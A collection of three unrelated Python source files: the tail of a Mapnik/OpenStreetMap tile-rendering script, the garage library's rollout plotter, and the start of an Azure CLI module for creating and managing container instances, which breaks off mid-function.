c *= 2
def fromLLtoPixel(self,ll,zoom):
d = self.zc[zoom]
e = round(d[0] + ll[0] * self.Bc[zoom])
f = minmax(sin(DEG_TO_RAD * ll[1]),-0.9999,0.9999)
g = round(d[1] + 0.5*log((1+f)/(1-f))*-self.Cc[zoom])
return (e,g)
def fromPixelToLL(self,px,zoom):
e = self.zc[zoom]
f = (px[0] - e[0])/self.Bc[zoom]
g = (px[1] - e[1])/-self.Cc[zoom]
h = RAD_TO_DEG * ( 2 * atan(exp(g)) - 0.5 * pi)
return (f,h)
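# Illustrative round-trip check (not executed by this script): the two helpers
# are approximately inverse at a given zoom level, e.g.
#   gprj = GoogleProjection(19)
#   px = gprj.fromLLtoPixel((11.5, 48.1), 12)   # (lon, lat) -> tile pixel coords
#   ll = gprj.fromPixelToLL(px, 12)             # back to roughly (11.5, 48.1)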
class RenderThread:
def __init__(self, tile_dir, mapfile, q, printLock, maxZoom):
self.tile_dir = tile_dir
self.q = q
self.m = mapnik.Map(256, 256)
self.printLock = printLock
# Load style XML
mapnik.load_map(self.m, mapfile, True)
# Obtain <Map> projection
self.prj = mapnik.Projection(self.m.srs)
# Projects between tile pixel co-ordinates and LatLong (EPSG:4326)
self.tileproj = GoogleProjection(maxZoom+1)
def render_tile(self, tile_uri, x, y, z):
# Calculate pixel positions of bottom-left & top-right
p0 = (x * 256, (y + 1) * 256)
p1 = ((x + 1) * 256, y * 256)
# Convert to LatLong (EPSG:4326)
l0 = self.tileproj.fromPixelToLL(p0, z);
l1 = self.tileproj.fromPixelToLL(p1, z);
# Convert to map projection (e.g. mercator co-ords EPSG:900913)
c0 = self.prj.forward(mapnik.Coord(l0[0],l0[1]))
c1 = self.prj.forward(mapnik.Coord(l1[0],l1[1]))
# Bounding box for the tile
if hasattr(mapnik,'mapnik_version') and mapnik.mapnik_version() >= 800:
bbox = mapnik.Box2d(c0.x,c0.y, c1.x,c1.y)
else:
bbox = mapnik.Envelope(c0.x,c0.y, c1.x,c1.y)
render_size = 256
self.m.resize(render_size, render_size)
self.m.zoom_to_box(bbox)
if(self.m.buffer_size < 128):
self.m.buffer_size = 128
# Render image with default Agg renderer
im = mapnik.Image(render_size, render_size)
mapnik.render(self.m, im)
im.save(tile_uri, 'png256')
def loop(self):
while True:
#Fetch a tile from the queue and render it
r = self.q.get()
            if r is None:
self.q.task_done()
break
else:
(name, tile_uri, x, y, z) = r
exists= ""
if os.path.isfile(tile_uri):
exists= "exists"
else:
self.render_tile(tile_uri, x, y, z)
bytes=os.stat(tile_uri)[6]
empty= ''
if bytes == 103:
empty = " Empty Tile "
self.printLock.acquire()
print name, ":", z, x, y, exists, empty
self.printLock.release()
self.q.task_done()
def render_tiles(bbox, mapfile, tile_dir, minZoom=1,maxZoom=18, name="unknown", num_threads=NUM_THREADS, tms_scheme=False):
print "render_tiles(",bbox, mapfile, tile_dir, minZoom,maxZoom, name,")"
# Launch rendering threads
queue = Queue(32)
printLock = threading.Lock()
renderers = {}
for i in range(num_threads):
renderer = RenderThread(tile_dir, mapfile, queue, printLock, maxZoom)
render_thread = threading.Thread(target=renderer.loop)
render_thread.start()
#print "Started render thread %s" % render_thread.getName()
renderers[i] = render_thread
if not os.path.isdir(tile_dir):
os.mkdir(tile_dir)
gprj = GoogleProjection(maxZoom+1)
ll0 = (bbox[0],bbox[3])
ll1 = (bbox[2],bbox[1])
for z in range(minZoom,maxZoom + 1):
px0 = gprj.fromLLtoPixel(ll0,z)
px1 = gprj.fromLLtoPixel(ll1,z)
# check if we have directories in place
zoom = "%s" % z
if not os.path.isdir(tile_dir + zoom):
os.mkdir(tile_dir + zoom)
for x in range(int(px0[0]/256.0),int(px1[0]/256.0)+1):
# Validate x co-ordinate
if (x < 0) or (x >= 2**z):
continue
# check if we have directories in place
str_x = "%s" % x
if not os.path.isdir(tile_dir + zoom + '/' + str_x):
os.mkdir(tile_dir + zoom + '/' + str_x)
for y in range(int(px0[1]/256.0),int(px1[1]/256.0)+1):
                # Validate y co-ordinate
if (y < 0) or (y >= 2**z):
continue
# flip y to match OSGEO TMS spec
if tms_scheme:
str_y = "%s" % ((2**z-1) - y)
else:
str_y = "%s" % y
tile_uri = tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'
# Submit tile to be rendered into the queue
t = (name, tile_uri, x, y, z)
try:
queue.put(t)
except KeyboardInterrupt:
raise SystemExit("Ctrl-c detected, exiting...")
# Signal render threads to exit by sending empty request to queue
for i in range(num_threads):
queue.put(None)
# wait for pending rendering jobs to complete
queue.join()
for i in range(num_threads):
renderers[i].join()
if __name__ == "__main__":
path=sys.argv[1] #first argument, either mapnik xml file or directory of files
tileDir=sys.argv[2]
kwargs = dict(x.split('=', 1) for x in sys.argv[3:]) #make dictionary from variable number of arguments passed to script (after files directory)
args={'minzoom':None,'maxzoom':None} #default arguments for converter function
paths=[]
for key, value in kwargs.iteritems():
if key=='minzoom':
args['minzoom']=value
if key=='maxzoom':
args['maxzoom']=value
split=path.rsplit('.')
if split[len(split)-1]=='xml': paths.append(path)
if '/' in split[len(split)-1]: #if path is making reference to a directory
        if path[len(path)-1]!='/': #if '/' is not included as last character in the path
path=path+'/'
for filename in glob.glob(os.path.join(path, '*.xml')): paths.append(filename) #get list of mapnik xml files
else:
print 'not an xml file nor directory, quitting script'
sys.exit()
#minZoom=int(sys.argv[3])
#maxZoom=int(sys.argv[4])
target=len(paths)
count=1
for mapfile in paths: #loop over list of mapnik files
tile_dir=tileDir #initialize internal variable of folder for tiles, with copy from one provided in script parameters
outputPath=[] #extra output path to use in case of multiple files
print 'processing file: '+mapfile+' number: '+str(count)+' out of '+str(target)+' files'
tree = ET.parse(mapfile) #read mapnik xml to find bounding box parameters
root = tree.getroot()
params=root.find('Parameters')
bbox=[]
for i in params:
if i.attrib['name']=='bounds':
bbox=[float(n) for n in i.text.split(',')]
            if i.attrib['name']=='minzoom' and args['minzoom']==None: #if zoom is specified in mapfile
                args['minzoom']=i.text
            if i.attrib['name']=='maxzoom' and args['maxzoom']==None:
                args['maxzoom']=i.text
if args['minzoom']==None: args['minzoom']=0 #if zooms were not specified in file, use defaults
if args['maxzoom']==None: args['maxzoom']=14
bbox=tuple(bbox) #make tuple of bounding box
layer=root.find('Layer')
ds=layer.find('Datasource')#find datasource
for i in ds:
if i.attrib['name']=='file':
datasource=i.text #path to datasource shapefile
datasourcePATH=datasource.rsplit('/',1)[0] #path to datasource (without the file)
shapeNAME=datasource.rsplit('/',1)[1].rsplit('.',1)[0] #name (just the name, without extension) of the shapefile
if target>1: #create folder for output tiles (which will contain other layer's subfolders with tiles)
            if tile_dir[len(tile_dir)-1]=='/': #if last '/' character was included in path
tile_dir=tile_dir+shapeNAME+'/' #name subfolder according to name of shapefile
else:
tile_dir=tile_dir+'/'+shapeNAME+'/' #name subfolder according to name of shapefile
if not os.path.exists(tile_dir):
os.makedirs(tile_dir)
metadataFiles=[]
for filename in glob.glob(os.path.join(datasourcePATH, '*metadata.json')): metadataFiles.append(filename)
if len(metadataFiles)>0: #write to json metadata if exists (add bounding box parameters)
for mf in metadataFiles:
if shapeNAME in mf.rsplit('/',1)[1]: #IF THE NAME OF THE SHAPEFILE IS IN THE FILENAME (without the path)
with open(mf) as data_file:
metaData = json.load(data_file)
metaData['bounds']=[x for x in bbox] #add the extents
with open(tile_dir+shapeNAME+'_metadata.json', 'w') as fp: json.dump(metaData,fp)
if not os.path.isfile(tile_dir+shapeNAME+'_metadata.json'): #if file didn't exist, create it
metaData={} #create json with bounding box
metaData['bounds']=[x for x in bbox]
with open(tile_dir+shapeNAME+'_metadata.json', 'w') as fp: json.dump(metaData,fp) #create bounding box json
render_tiles(bbox, mapfile, tile_dir, int(args['minzoom']), int(args['maxzoom']))
count+=1
#env_file=mapfile.rsplit('.',1)[0] #take file styles extension
#env_file=env_file+'_ext.csv' #add the extents extension for reading envelope file
#env=DataFrame.from_csv(env_file)
#bbox=(env.ix['lon_1',0],env.ix['lat_2',0],env.ix['lon_2',0],env.ix['lat_1',0])
#bbox=(11.4,48.07, 11.7,48.22)
#home = os.environ['HOME']
#try:
# mapfile = os.environ['MAPNIK_MAP_FILE']
#except KeyError:
# mapfile = home + "/svn.openstreetmap.org/applications/rendering/mapnik/osm-local.xml"
#try:
# tile_dir = os.environ['MAPNIK_TILE_DIR']
#except KeyError:
# tile_dir = home + "/osm/tiles/"
#if not tile_dir.endswith('/'):
# tile_dir = tile_dir + '/'
#-------------------------------------------------------------------------
#
# Change the following for different bounding boxes and zoom levels
#
# Start with an overview
# World
#bbox = (-180.0,-90.0, 180.0,90.0)
#render_tiles(bbox, mapfile, tile_dir, 0, 5, "World")
#minZoom = 10
#maxZoom = 16
#bbox = (-2, 50.0,1.0,52.0)
#render_tiles(bbox, mapfile, tile_dir, minZoom, maxZoom)
# Muenchen
# bbox = (11.4,48.07, 11.7,48.22)
#render_tiles(bbox, mapfile, tile_dir, 1, 12 , "Muenchen")
# Muenchen+
#bbox = (11.3,48.01, 12.15,48.44)
#render_tiles(bbox, mapfile, tile_dir, 7, 12 , "Muenchen+")
# Muenchen++
#bbox = (10.92,47.7, 12.24,48.61)
#render_tiles(bbox, mapfile, tile_dir, 7, 12 , "Muenchen++")
# Nuernberg
#bbox=(10.903198,49.560441,49.633534,11.038085)
#render_tiles(bbox, mapfile, tile_dir, 10, 16, "Nuernberg")
# Karlsruhe
#bbox=(8.179113,48.933617,8.489252,49.081707)
#render_tiles(bbox, mapfile, tile_dir, 10, 16, "Karlsruhe")
# Karlsruhe+
#bbox = (8.3,48.95,8.5,49.05)
#render_tiles(bbox, mapfile, tile_dir, 1, 16, "Karlsruhe+")
# Augsburg
#bbox = (8.3,48.95,8.5,49.05)
#render_tiles(bbox, mapfile, tile_dir, 1, 16, "Augsburg")
# Augsburg+
#bbox=(10.773251,48.369594,10.883834,48.438577)
#render_tiles(bbox, mapfile, tile_dir, 10, 14, "Augsburg+")
# Europe+
#bbox = (1.0,10.0, 20.6,50.0)
#render_tiles(bbox, mapfile, tile_dir, 1, 11 , "Europe+")
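# Example invocation (sketch only; the script filename is assumed). Arguments follow the
# sys.argv parsing above: <mapnik xml file or directory> <tile output dir> [minzoom=N] [maxzoom=N]
#   python render_tiles.py ./styles/ ./tiles/ minzoom=0 maxzoom=12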
|
plotter.py
|
import atexit
from collections import namedtuple
from enum import Enum
from multiprocessing import JoinableQueue
from multiprocessing import Process
import platform
from threading import Thread
import numpy as np
from garage.sampler.utils import rollout
__all__ = ['Plotter']
class Op(Enum):
STOP = 0
UPDATE = 1
DEMO = 2
Message = namedtuple('Message', ['op', 'args', 'kwargs'])
class Plotter:
# Static variable used to disable the plotter
enable = True
# List containing all plotters instantiated in the process
__plotters = []
def __init__(self, standalone=False):
Plotter.__plotters.append(self)
self._process = None
self._queue = None
def _worker_start(self):
env = None
policy = None
max_length = None
initial_rollout = True
try:
# Each iteration will process ALL messages currently in the
# queue
while True:
msgs = {}
# If true, block and yield processor
if initial_rollout:
msg = self._queue.get()
msgs[msg.op] = msg
# Only fetch the last message of each type
while not self._queue.empty():
msg = self._queue.get()
msgs[msg.op] = msg
else:
# Only fetch the last message of each type
while not self._queue.empty():
msg = self._queue.get_nowait()
msgs[msg.op] = msg
if Op.STOP in msgs:
break
elif Op.UPDATE in msgs:
env, policy = msgs[Op.UPDATE].args
elif Op.DEMO in msgs:
param_values, max_length = msgs[Op.DEMO].args
policy.set_param_values(param_values)
initial_rollout = False
rollout(
env,
policy,
max_path_length=max_length,
animated=True,
speedup=5)
else:
if max_length:
rollout(
env,
policy,
max_path_length=max_length,
animated=True,
speedup=5)
except KeyboardInterrupt:
pass
def close(self):
if not Plotter.enable:
return
if self._process and self._process.is_alive():
while not self._queue.empty():
self._queue.get()
self._queue.task_done()
self._queue.put(Message(op=Op.STOP, args=None, kwargs=None))
self._queue.close()
self._process.join()
@staticmethod
def disable():
"""Disable all instances of the Plotter class."""
Plotter.enable = False
@staticmethod
def get_plotters():
return Plotter.__plotters
def init_worker(self):
if not Plotter.enable:
return
self._queue = JoinableQueue()
if ('Darwin' in platform.platform()):
self._process = Thread(target=self._worker_start)
else:
self._process = Process(target=self._worker_start)
self._process.daemon = True
self._process.start()
atexit.register(self.close)
def init_plot(self, env, policy):
if not Plotter.enable:
return
if not (self._process and self._queue):
self.init_worker()
# Needed in order to draw glfw window on the main thread
if ('Darwin' in platform.platform()):
rollout(
env, policy, max_path_length=np.inf, animated=True, speedup=5)
self._queue.put(Message(op=Op.UPDATE, args=(env, policy), kwargs=None))
def update_plot(self, policy, max_length=np.inf):
if not Plotter.enable:
return
self._queue.put(
Message(
op=Op.DEMO,
args=(policy.get_param_values(), max_length),
kwargs=None))
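# Minimal usage sketch (not part of the original module; assumes a garage-compatible
# `env` and `policy` pair that `rollout` can animate):
#   plotter = Plotter()
#   plotter.init_plot(env, policy)                 # start the worker, queue an UPDATE message
#   plotter.update_plot(policy, max_length=500)    # queue a DEMO rollout with current params
#   plotter.close()                                # drain the queue and stop the worker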
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-few-public-methods,no-self-use,too-many-locals,line-too-long,unused-argument
import errno
try:
import msvcrt
except ImportError:
# Not supported for Linux machines.
pass
import platform
import select
import shlex
import signal
import sys
import threading
import time
try:
import termios
import tty
except ImportError:
# Not supported for Windows machines.
pass
import websocket
import yaml
from knack.log import get_logger
from knack.prompting import prompt_pass, prompt, NoTTYException
from knack.util import CLIError
from azure.mgmt.containerinstance.models import (AzureFileVolume, Container, ContainerGroup, ContainerGroupNetworkProtocol,
ContainerPort, ImageRegistryCredential, IpAddress, Port, ResourceRequests,
ResourceRequirements, Volume, VolumeMount, ContainerExecRequestTerminalSize,
GitRepoVolume, LogAnalytics, ContainerGroupDiagnostics, ContainerGroupNetworkProfile,
ContainerGroupIpAddressType, ResourceIdentityType, ContainerGroupIdentity)
from azure.cli.core.util import sdk_no_wait
from ._client_factory import (cf_container_groups, cf_container, cf_log_analytics, cf_resource, cf_network)
logger = get_logger(__name__)
WINDOWS_NAME = 'Windows'
SERVER_DELIMITER = '.'
ACR_SERVER_DELIMITER = '.azurecr.io'
AZURE_FILE_VOLUME_NAME = 'azurefile'
SECRETS_VOLUME_NAME = 'secrets'
GITREPO_VOLUME_NAME = 'gitrepo'
MSI_LOCAL_ID = '[system]'
def list_containers(client, resource_group_name=None):
"""List all container groups in a resource group. """
if resource_group_name is None:
return client.list()
return client.list_by_resource_group(resource_group_name)
def get_container(client, resource_group_name, name):
"""Show details of a container group. """
return client.get(resource_group_name, name)
def delete_container(client, resource_group_name, name, **kwargs):
"""Delete a container group. """
return client.delete(resource_group_name, name)
# pylint: disable=too-many-statements
def create_container(cmd,
resource_group_name,
name=None,
image=None,
location=None,
cpu=1,
memory=1.5,
restart_policy='Always',
ports=None,
protocol=None,
os_type='Linux',
ip_address=None,
dns_name_label=None,
command_line=None,
environment_variables=None,
secure_environment_variables=None,
registry_login_server=None,
registry_username=None,
registry_password=None,
azure_file_volume_share_name=None,
azure_file_volume_account_name=None,
azure_file_volume_account_key=None,
azure_file_volume_mount_path=None,
log_analytics_workspace=None,
log_analytics_workspace_key=None,
vnet=None,
vnet_name=None,
vnet_address_prefix='10.0.0.0/16',
subnet=None,
subnet_address_prefix='10.0.0.0/24',
network_profile=None,
gitrepo_url=None,
gitrepo_dir='.',
gitrepo_revision=None,
gitrepo_mount_path=None,
secrets=None,
secrets_mount_path=None,
file=None,
assign_identity=None,
identity_scope=None,
identity_role='Contributor',
no_wait=False):
"""Create a container group. """
if file:
return _create_update_from_file(cmd.cli_ctx, resource_group_name, name, location, file, no_wait)
if not name:
raise CLIError("error: the --name/-n argument is required unless specified with a passed in file.")
if not image:
raise CLIError("error: the --image argument is required unless specified with a passed in file.")
ports = ports or [80]
protocol = protocol or ContainerGroupNetworkProtocol.tcp
container_resource_requirements = _create_resource_requirements(cpu=cpu, memory=memory)
image_registry_credentials = _create_image_registry_credentials(registry_login_server=registry_login_server,
registry_username=registry_username,
registry_password=registry_password,
image=image)
command = shlex.split(command_line) if command_line else None
volumes = []
mounts = []
azure_file_volume = _create_azure_file_volume(azure_file_volume_share_name=azure_file_volume_share_name,
azure_file_volume_account_name=azure_file_volume_account_name,
azure_file_volume_account_key=azure_file_volume_account_key)
azure_file_volume_mount = _create_azure_file_volume_mount(azure_file_volume=azure_file_volume,
azure_file_volume_mount_path=azure_file_volume_mount_path)
if azure_file_volume:
volumes.append(azure_file_volume)
mounts.append(azure_file_volume_mount)
secrets_volume = _create_secrets_volume(secrets)
secrets_volume_mount = _create_secrets_volume_mount(secrets_volume=secrets_volume,
secrets_mount_path=secrets_mount_path)
if secrets_volume:
volumes.append(secrets_volume)
mounts.append(secrets_volume_mount)
diagnostics = None
tags = {}
if log_analytics_workspace and log_analytics_workspace_key:
log_analytics = LogAnalytics(
workspace_id=log_analytics_workspace, workspace_key=log_analytics_workspace_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics
)
elif log_analytics_workspace and not log_analytics_workspace_key:
diagnostics, tags = _get_diagnostics_from_workspace(
cmd.cli_ctx, log_analytics_workspace)
if not diagnostics:
raise CLIError('Log Analytics workspace "' + log_analytics_workspace + '" not found.')
elif not log_analytics_workspace and log_analytics_workspace_key:
raise CLIError('"--log-analytics-workspace-key" requires "--log-analytics-workspace".')
gitrepo_volume = _create_gitrepo_volume(gitrepo_url=gitrepo_url, gitrepo_dir=gitrepo_dir, gitrepo_revision=gitrepo_revision)
gitrepo_volume_mount = _create_gitrepo_volume_mount(gitrepo_volume=gitrepo_volume, gitrepo_mount_path=gitrepo_mount_path)
if gitrepo_volume:
volumes.append(gitrepo_volume)
mounts.append(gitrepo_volume_mount)
# Concatenate secure and standard environment variables
if environment_variables and secure_environment_variables:
environment_variables = environment_variables + secure_environment_variables
else:
environment_variables = environment_variables or secure_environment_variables
identity = None
if assign_identity is not None:
identity = _build_identities_info(assign_identity)
# Set up VNET, subnet and network profile if needed
if subnet and not network_profile:
network_profile = _get_vnet_network_profile(cmd, location, resource_group_name, vnet, vnet_address_prefix, subnet, subnet_address_prefix)
cg_network_profile = None
if network_profile:
cg_network_profile = ContainerGroupNetworkProfile(id=network_profile)
cgroup_ip_address = _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile)
container = Container(name=name,
image=image,
resources=container_resource_requirements,
command=command,
ports=[ContainerPort(
port=p, protocol=protocol) for p in ports] if cgroup_ip_address else None,
environment_variables=environment_variables,
volume_mounts=mounts or None)
cgroup = ContainerGroup(location=location,
identity=identity,
containers=[container],
os_type=os_type,
restart_policy=restart_policy,
ip_address=cgroup_ip_address,
image_registry_credentials=image_registry_credentials,
volumes=volumes or None,
network_profile=cg_network_profile,
diagnostics=diagnostics,
tags=tags)
container_group_client = cf_container_groups(cmd.cli_ctx)
lro = sdk_no_wait(no_wait, container_group_client.create_or_update, resource_group_name,
name, cgroup)
if assign_identity is not None and identity_scope:
from azure.cli.core.commands.arm import assign_identity
cg = container_group_client.get(resource_group_name, name)
assign_identity(cmd.cli_ctx, lambda: cg, lambda cg: cg, identity_role, identity_scope)
return lro
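# Example CLI usage (illustrative sketch; resource group, name and image are placeholders):
#   az container create -g MyResourceGroup -n mycontainer --image nginx --ports 80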
def _build_identities_info(identities):
identities = identities or []
identity_type = ResourceIdentityType.none
if not identities or MSI_LOCAL_ID in identities:
identity_type = ResourceIdentityType.system_assigned
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities and identity_type == ResourceIdentityType.system_assigned:
identity_type = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_type = ResourceIdentityType.user_assigned
identity = ContainerGroupIdentity(type=identity_type)
if external_identities:
identity.user_assigned_identities = {e: {} for e in external_identities}
return identity
def _get_resource(client, resource_group_name, *subresources):
from msrestazure.azure_exceptions import CloudError
try:
resource = client.get(resource_group_name, *subresources)
return resource
except CloudError as ex:
if ex.error.error == "NotFound" or ex.error.error == "ResourceNotFound":
return None
else:
raise
def _get_vnet_network_profile(cmd, location, resource_group_name, vnet, vnet_address_prefix, subnet, subnet_address_prefix):
from azure.cli.core.profiles import ResourceType
from msrestazure.tools import parse_resource_id, is_valid_resource_id
aci_delegation_service_name = "Microsoft.ContainerInstance/containerGroups"
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
aci_delegation = Delegation(
name=aci_delegation_service_name,
service_name=aci_delegation_service_name
)
ncf = cf_network(cmd.cli_ctx)
vnet_name = vnet
subnet_name = subnet
if is_valid_resource_id(subnet):
parsed_subnet_id = parse_resource_id(subnet)
subnet_name = parsed_subnet_id['resource_name']
vnet_name = parsed_subnet_id['name']
resource_group_name = parsed_subnet_id['resource_group']
elif is_valid_resource_id(vnet):
parsed_vnet_id = parse_resource_id(vnet)
vnet_name = parsed_vnet_id['resource_name']
resource_group_name = parsed_vnet_id['resource_group']
default_network_profile_name = "aci-network-profile-{}-{}".format(vnet_name, subnet_name)
subnet = _get_resource(ncf.subnets, resource_group_name, vnet_name, subnet_name)
# For an existing subnet, validate and add delegation if needed
if subnet:
logger.info('Using existing subnet "%s" in resource group "%s"', subnet.name, resource_group_name)
for sal in (subnet.service_association_links or []):
if sal.linked_resource_type != aci_delegation_service_name:
raise CLIError("Can not use subnet with existing service association links other than {}.".format(aci_delegation_service_name))
if not subnet.delegations:
logger.info('Adding ACI delegation to the existing subnet.')
subnet.delegations = [aci_delegation]
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
else:
for delegation in subnet.delegations:
if delegation.service_name != aci_delegation_service_name:
raise CLIError("Can not use subnet with existing delegations other than {}".format(aci_delegation_service_name))
network_profile = _get_resource(ncf.network_profiles, resource_group_name, default_network_profile_name)
if network_profile:
logger.info('Using existing network profile "%s"', default_network_profile_name)
return network_profile.id
# Create new subnet and Vnet if not exists
else:
Subnet, VirtualNetwork, AddressSpace = cmd.get_models('Subnet', 'VirtualNetwork',
'AddressSpace', resource_type=ResourceType.MGMT_NETWORK)
vnet = _get_resource(ncf.virtual_networks, resource_group_name, vnet_name)
if not vnet:
logger.info('Creating new vnet "%s" in resource group "%s"', vnet_name, resource_group_name)
ncf.virtual_networks.create_or_update(resource_group_name,
vnet_name,
VirtualNetwork(name=vnet_name,
location=location,
address_space=AddressSpace(address_prefixes=[vnet_address_prefix])))
subnet = Subnet(
name=subnet_name,
location=location,
address_prefix=subnet_address_prefix,
delegations=[aci_delegation])
logger.info('Creating new subnet "%s" in resource group "%s"', subnet_name, resource_group_name)
subnet = ncf.subnets.create_or_update(resource_group_name, vnet_name, subnet_name, subnet).result()
NetworkProfile, ContainerNetworkInterfaceConfiguration, IPConfigurationProfile = cmd.get_models('NetworkProfile',
'ContainerNetworkInterfaceConfiguration',
'IPConfigurationProfile',
resource_type=ResourceType.MGMT_NETWORK)
# In all cases, create the network profile with aci NIC
network_profile = NetworkProfile(
name=default_network_profile_name,
location=location,
container_network_interface_configurations=[ContainerNetworkInterfaceConfiguration(
name="eth0",
ip_configurations=[IPConfigurationProfile(
name="ipconfigprofile",
subnet=subnet
)]
)]
)
logger.info('Creating network profile "%s" in resource group "%s"', default_network_profile_name, resource_group_name)
network_profile = ncf.network_profiles.create_or_update(resource_group_name, default_network_profile_name, network_profile).result()
return network_profile.id
def _get_diagnostics_from_workspace(cli_ctx, log_analytics_workspace):
from msrestazure.tools import parse_resource_id
log_analytics_client = cf_log_analytics(cli_ctx)
for workspace in log_analytics_client.list():
if log_analytics_workspace == workspace.name or log_analytics_workspace == workspace.customer_id:
keys = log_analytics_client.get_shared_keys(
parse_resource_id(workspace.id)['resource_group'], workspace.name)
log_analytics = LogAnalytics(
workspace_id=workspace.customer_id, workspace_key=keys.primary_shared_key)
diagnostics = ContainerGroupDiagnostics(
log_analytics=log_analytics)
return (diagnostics, {'oms-resource-link': workspace.id})
return None, {}
def _create_update_from_file(cli_ctx, resource_group_name, name, location, file, no_wait):
resource_client = cf_resource(cli_ctx)
container_group_client = cf_container_groups(cli_ctx)
cg_defintion = None
try:
with open(file, 'r') as f:
cg_defintion = yaml.safe_load(f)
except OSError: # FileNotFoundError introduced in Python 3
raise CLIError("No such file or directory: " + file)
except yaml.YAMLError as e:
raise CLIError("Error while parsing yaml file:\n\n" + str(e))
# Validate names match if both are provided
if name and cg_defintion.get('name', None):
if name != cg_defintion.get('name', None):
raise CLIError("The name parameter and name from yaml definition must match.")
else:
# Validate at least one name is provided
name = name or cg_defintion.get('name', None)
if cg_defintion.get('name', None) is None and not name:
raise CLIError("The name of the container group is required")
cg_defintion['name'] = name
location = location or cg_defintion.get('location', None)
if not location:
location = resource_client.resource_groups.get(resource_group_name).location
cg_defintion['location'] = location
api_version = cg_defintion.get('apiVersion', None) or container_group_client.api_version
return sdk_no_wait(no_wait,
resource_client.resources.create_or_update,
resource_group_name,
"Microsoft.ContainerInstance",
'',
"containerGroups",
name,
api_version,
cg_defintion)
# pylint: disable=inconsistent-return-statements
def _create_resource_requirements(cpu, memory):
"""Create resource requirements. """
if cpu or memory:
container_resource_requests = ResourceRequests(memory_in_gb=memory, cpu=cpu)
return ResourceRequirements(requests=container_resource_requests)
def _create_image_registry_credentials(registry_login_server, registry_username, registry_password, image):
"""Create image registry credentials. """
image_registry_credentials = None
if registry_login_server:
if not registry_username:
raise CLIError('Please specify --registry-username in order to use custom image registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use custom image registry.')
image_registry_credentials = [ImageRegistryCredential(server=registry_login_server,
username=registry_username,
password=registry_password)]
elif ACR_SERVER_DELIMITER in image.split("/")[0]:
if not registry_username:
try:
registry_username = prompt(msg='Image registry username: ')
except NoTTYException:
raise CLIError('Please specify --registry-username in order to use Azure Container Registry.')
if not registry_password:
try:
registry_password = prompt_pass(msg='Image registry password: ')
except NoTTYException:
raise CLIError('Please specify --registry-password in order to use Azure Container Registry.')
acr_server = image.split("/")[0] if image.split("/") else None
if acr_server:
image_registry_credentials = [ImageRegistryCredential(server=acr_server,
username=registry_username,
password=registry_password)]
elif registry_username and registry_password and SERVER_DELIMITER in image.split("/")[0]:
login_server = image.split("/")[0] if image.split("/") else None
if login_server:
image_registry_credentials = [ImageRegistryCredential(server=login_server,
username=registry_username,
password=registry_password)]
else:
raise CLIError('Failed to parse login server from image name; please explicitly specify --registry-server.')
return image_registry_credentials
def _create_azure_file_volume(azure_file_volume_share_name, azure_file_volume_account_name, azure_file_volume_account_key):
"""Create Azure File volume. """
azure_file_volume = None
if azure_file_volume_share_name:
if not azure_file_volume_account_name:
raise CLIError('Please specify --azure-file-volume-account-name in order to use Azure File volume.')
if not azure_file_volume_account_key:
try:
azure_file_volume_account_key = prompt_pass(msg='Azure File storage account key: ')
except NoTTYException:
raise CLIError('Please specify --azure-file-volume-account-key in order to use Azure File volume.')
azure_file_volume = AzureFileVolume(share_name=azure_file_volume_share_name,
storage_account_name=azure_file_volume_account_name,
storage_account_key=azure_file_volume_account_key)
return Volume(name=AZURE_FILE_VOLUME_NAME, azure_file=azure_file_volume) if azure_file_volume else None
def _create_secrets_volume(secrets):
"""Create secrets volume. """
return Volume(name=SECRETS_VOLUME_NAME, secret=secrets) if secrets else None
def _create_gitrepo_volume(gitrepo_url, gitrepo_dir, gitrepo_revision):
"""Create Git Repo volume. """
gitrepo_volume = GitRepoVolume(repository=gitrepo_url, directory=gitrepo_dir, revision=gitrepo_revision)
return Volume(name=GITREPO_VOLUME_NAME, git_repo=gitrepo_volume) if gitrepo_url else None
# pylint: disable=inconsistent-return-statements
def _create_azure_file_volume_mount(azure_file_volume, azure_file_volume_mount_path):
"""Create Azure File volume mount. """
if azure_file_volume_mount_path:
if not azure_file_volume:
raise CLIError('Please specify --azure-file-volume-share-name --azure-file-volume-account-name --azure-file-volume-account-key '
'to enable Azure File volume mount.')
return VolumeMount(name=AZURE_FILE_VOLUME_NAME, mount_path=azure_file_volume_mount_path)
def _create_secrets_volume_mount(secrets_volume, secrets_mount_path):
"""Create secrets volume mount. """
if secrets_volume:
if not secrets_mount_path:
raise CLIError('Please specify --secrets --secrets-mount-path '
'to enable secrets volume mount.')
return VolumeMount(name=SECRETS_VOLUME_NAME, mount_path=secrets_mount_path)
def _create_gitrepo_volume_mount(gitrepo_volume, gitrepo_mount_path):
"""Create Git Repo volume mount. """
if gitrepo_mount_path:
if not gitrepo_volume:
raise CLIError('Please specify --gitrepo-url (--gitrepo-dir --gitrepo-revision) '
'to enable Git Repo volume mount.')
return VolumeMount(name=GITREPO_VOLUME_NAME, mount_path=gitrepo_mount_path)
# pylint: disable=inconsistent-return-statements
def _create_ip_address(ip_address, ports, protocol, dns_name_label, network_profile):
"""Create IP address. """
if (ip_address and ip_address.lower() == 'public') or dns_name_label:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
dns_name_label=dns_name_label, type=ContainerGroupIpAddressType.public)
elif network_profile:
return IpAddress(ports=[Port(protocol=protocol, port=p) for p in ports],
type=ContainerGroupIpAddressType.private)
# pylint: disable=inconsistent-return-statements
def container_logs(cmd, resource_group_name, name, container_name=None, follow=False):
"""Tail a container instance log. """
container_client = cf_container(cmd.cli_ctx)
container_group_client = cf_container_groups(cmd.cli_ctx)
container_group = container_group_client.get(resource_group_name, name)
# If container name is not present, use the first container.
if container_name is None:
container_name = container_group.containers[0].name
if not follow:
log = container_client.list_logs(resource_group_name, name, container_name)
print(log.content)
else:
_start_streaming(
terminate_condition=_is_container_terminated,
terminate_condition_args=(container_group_client, resource_group_name, name, container_name),
